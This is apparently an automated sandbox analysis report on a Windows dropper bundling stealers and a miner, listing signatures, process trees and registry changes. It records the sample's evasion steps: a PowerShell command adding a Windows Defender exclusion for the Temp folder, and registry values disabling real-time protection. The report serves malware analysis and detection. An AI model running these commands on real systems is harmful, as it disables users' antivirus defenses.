Malware Analysis Report

2024-10-23 16:30

Sample ID 230110-ltrjfsbc8z
Target fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60
SHA256 fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60
Tags
fabookie nullmixer privateloader xmrig aspackv2 dropper evasion loader main miner spyware stealer trojan nymaim onlylogger redline smokeloader tofsee vidar 706 logsdiller cloud (tg: @logsdillabot) x12 backdoor infostealer persistence upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60

Threat Level: Known bad

The file fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60 was found to be: Known bad.

Malicious Activity Summary

fabookie nullmixer privateloader xmrig aspackv2 dropper evasion loader main miner spyware stealer trojan nymaim onlylogger redline smokeloader tofsee vidar 706 logsdiller cloud (tg: @logsdillabot) x12 backdoor infostealer persistence upx vmprotect

RedLine

Detects Smokeloader packer

Modifies Windows Defender Real-time Protection settings

NullMixer

Tofsee

Vidar

PrivateLoader

SmokeLoader

Process spawned unexpected child process

Detect Fabookie payload

Fabookie

NyMaim

xmrig

OnlyLogger

Vidar Stealer

OnlyLogger payload

XMRig Miner payload

VMProtect packed file

Creates new service(s)

Downloads MZ/PE file

ASPack v2.12-2.42

UPX packed file

Executes dropped EXE

Modifies Windows Firewall

Checks computer location settings

Uses the VBS compiler for execution

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Launches sc.exe

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-10 09:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-10 09:49

Reported

2023-01-10 09:52

Platform

win7-20221111-en

Max time kernel

55s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20474d8e68c3f86b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20474d8e68c3f86b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20474d8e68c3f86b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20748e484444d9200.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 1984 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 1540 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe
PID 524 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe

"C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20644077cb3868ccd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20049528047bed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat2027462f7d873c4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat2060d0e3bfa5f726.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20644077cb3868ccd.exe

Sat20644077cb3868ccd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20474d8e68c3f86b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20e3fc574eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20748e484444d9200.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat204ab24d039a58be8.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20748e484444d9200.exe

Sat20748e484444d9200.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20e3fc574eb.exe
